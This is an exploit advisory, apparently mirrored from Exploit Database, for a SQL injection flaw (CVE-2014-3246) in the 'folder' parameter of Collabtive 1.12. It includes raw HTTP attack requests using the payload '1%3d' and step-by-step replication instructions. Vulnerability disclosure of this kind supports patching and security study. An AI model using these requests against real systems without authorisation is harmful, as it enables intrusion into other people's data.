Collabtive 1.2 – SQL Injection

• Exploit Database
• 8 阅读

• 作者： Deepak Rathore
  日期： 2014-05-08
• 类别：

  • webapps
  平台：

  • php
• 来源：https://www.exploit-db.com/exploits/33249/

• Vulnerability title: SQL Injection / SQL Error message in Collabtive
  application (CVE-2014-3246)
  CVE: CVE-2014-3246 (cordinated with
  Vendor: Collabtive
  Product: Collabtive (Open Source Project Management Software)
  Affected version: 1.12
  Fixed version: 2.0
  Reported by: Deepak Rathore
  Severity: Critical
  URL: http://[domain]/collabtive-12/managefile.php?action=showproject&id=2482
  Affected Users: Authenticated users
  Affected parameter(s): folder
  
  Issue details: The folder parameter appears to be vulnerable to SQL
  injection attacks. The payload 1%3d was submitted in the folder parameter,
  and a database error message was returned. You should review the contents
  of the error message, and the application's handling of other input, to
  confirm whether a vulnerability is present.The database appears to be
  MySQL.
  
  HTTP request:
  GET /manageajax.php?action=fileview_list&id=2482&folder=1%3d HTTP/1.1
  Host: collabtive.o-dyn.de
  User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:29.0) Gecko/20100101
  Firefox/29.0
  Accept: text/javascript, text/html, application/xml, text/xml, */*
  Accept-Language: en-US,en;q=0.5
  Accept-Encoding: gzip, deflate
  X-Requested-With: XMLHttpRequest
  X-Prototype-Version: 1.6.0.3
  Referer:
  http://xxx/managefile.php?action=showproject&id=2482
  Cookie: PHPSESSID=ba83d29aab270a7926ea1be2e1f830be;
  PHPSESSID=ba83d29aab270a7926ea1be2e1f830be
  Connection: keep-alive
  
  Steps to replicate:
  1. Login into application
  2. Go to "Desktop" tab and click on "Add project"
  3. Fill the project details in the project form and click on "Add" button
  4. After creating a project go to "Files" tab and Intercept the request
  5. At "manageajax.php" file, replace "folder" parameter value with "1%3d"
  =====================
  Original Request
  =====================
  GET /manageajax.php?action=fileview_list&id=2482&folder=0 HTTP/1.1
  Host: collabtive.o-dyn.de
  User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:29.0) Gecko/20100101
  Firefox/29.0
  Accept: text/javascript, text/html, application/xml, text/xml, */*
  Accept-Language: en-US,en;q=0.5
  Accept-Encoding: gzip, deflate
  X-Requested-With: XMLHttpRequest
  X-Prototype-Version: 1.6.0.3
  Referer:
  http://xxx/managefile.php?action=showproject&id=2482
  Cookie: PHPSESSID=ba83d29aab270a7926ea1be2e1f830be;
  PHPSESSID=ba83d29aab270a7926ea1be2e1f830be
  Connection: keep-alive
  ======================
  Attack Request
  ======================
  GET /manageajax.php?action=fileview_list&id=2482&folder=1%3d HTTP/1.1
  Host: collabtive.o-dyn.de
  User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:29.0) Gecko/20100101
  Firefox/29.0
  Accept: text/javascript, text/html, application/xml, text/xml, */*
  Accept-Language: en-US,en;q=0.5
  Accept-Encoding: gzip, deflate
  X-Requested-With: XMLHttpRequest
  X-Prototype-Version: 1.6.0.3
  Referer:
  http://xxx/managefile.php?action=showproject&id=2482
  Cookie: PHPSESSID=ba83d29aab270a7926ea1be2e1f830be;
  PHPSESSID=ba83d29aab270a7926ea1be2e1f830be
  Connection: keep-alive
  ======================
  6. Forward manipulated request to server and wait for response in browser
  7. SQL Error message is the proof of vulnerability.
  
  Tools used: Burp Suite proxy, Mozilla Firefox browser